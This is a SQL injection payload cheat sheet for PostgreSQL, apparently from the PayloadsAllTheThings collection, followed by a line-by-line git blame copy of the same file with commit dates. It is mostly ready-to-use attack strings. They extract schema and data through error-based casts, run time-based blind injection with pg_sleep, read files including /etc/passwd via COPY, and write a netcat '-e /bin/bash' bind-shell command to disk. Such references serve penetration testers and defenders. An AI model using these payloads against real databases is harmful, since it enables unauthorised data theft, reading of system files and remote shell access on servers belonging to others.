PayloadsAllTheThings/SQL Injection/PostgreSQL Injection.md

# POSTGRESQL

## PostgreSQL Comments

```sql
--
/**/  
```

## PostgreSQL Error Based - Basic

```sql
,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
```

## PostgreSQL Time Based

```sql
AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
```

## PostgreSQL File Read

```sql
select pg_ls_dir('./');
select pg_read_file('PG_VERSION', 0, 200);
```

NOTE: ``pg_read_file` doesn't accept the `/` character.

```sql
CREATE TABLE temp(t TEXT);
COPY temp FROM '/etc/passwd';
SELECT * FROM temp limit 1 offset 0;
```

## PostgreSQL File Write

```sql
CREATE TABLE pentestlab (t TEXT);
INSERT INTO pentestlab(t) VALUES('nc -lvvp 2346 -e /bin/bash');
SELECT * FROM pentestlab;
COPY pentestlab(t) TO '/tmp/pentestlab';
```

## References

* [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
-												SQL injections payloads separated + OAuth

											
										
										
											2016-11-29 16:27:35 +00:00
+								# POSTGRESQL
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								## PostgreSQL Comments
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
 								```sql
-												SQL Cheatsheets - Refactoring part 1

											
										
										
											2018-05-16 21:33:14 +00:00
+								--
 								/**/
 								```
 								## PostgreSQL Error Based - Basic
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
 								```sql
-												SQL injections payloads separated + OAuth

											
										
										
											2016-11-29 16:27:35 +00:00
+								,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
 								,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
 								,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
 								,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
-												SQL Cheatsheets - Refactoring part 1

											
										
										
											2018-05-16 21:33:14 +00:00
+								```
 								## PostgreSQL Time Based
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
 								```sql
-												SQL Cheatsheets - Refactoring part 1

											
										
										
											2018-05-16 21:33:14 +00:00
+								AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
+								AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
-												XSS CSP Bypass + PostgreSQL read/write

											
										
										
											2018-09-01 13:36:33 +00:00
+								```
 								## PostgreSQL File Read
 								```sql
-												Jenkins Grrovy + MSSQL UNC + PostgreSQL list files

											
										
										
											2019-02-17 19:02:16 +00:00
+								select pg_ls_dir('./');
-												XSS CSP Bypass + PostgreSQL read/write

											
										
										
											2018-09-01 13:36:33 +00:00
+								select pg_read_file('PG_VERSION', 0, 200);
 								```
-												Jenkins Grrovy + MSSQL UNC + PostgreSQL list files

											
										
										
											2019-02-17 19:02:16 +00:00
+								NOTE: ``pg_read_file` doesn't accept the `/` character.
-												XSS CSP Bypass + PostgreSQL read/write

											
										
										
											2018-09-01 13:36:33 +00:00
+								```sql
 								CREATE TABLE temp(t TEXT);
 								COPY temp FROM '/etc/passwd';
 								SELECT * FROM temp limit 1 offset 0;
 								```
 								## PostgreSQL File Write
 								```sql
 								CREATE TABLE pentestlab (t TEXT);
 								INSERT INTO pentestlab(t) VALUES('nc -lvvp 2346 -e /bin/bash');
 								SELECT * FROM pentestlab;
 								COPY pentestlab(t) TO '/tmp/pentestlab';
 								```
-												Adding references sectio

											
										
										
											2018-12-24 14:02:50 +00:00
+								## References
-												XSS CSP Bypass + PostgreSQL read/write

											
										
										
											2018-09-01 13:36:33 +00:00
 								* [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)